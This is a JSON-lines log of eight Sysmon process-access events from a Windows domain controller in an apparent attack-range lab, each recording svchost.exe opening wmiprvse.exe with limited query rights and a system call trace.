{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1055,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1056,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1057,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1058,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.924\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.924","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1059,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1060,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1061,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1062,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:12.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F66-5F25-0000-0010B7B90100}\r\nTargetProcessId: 2812\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:12.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F66-5F25-0000-0010B7B90100}","TargetProcessId":"2812","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
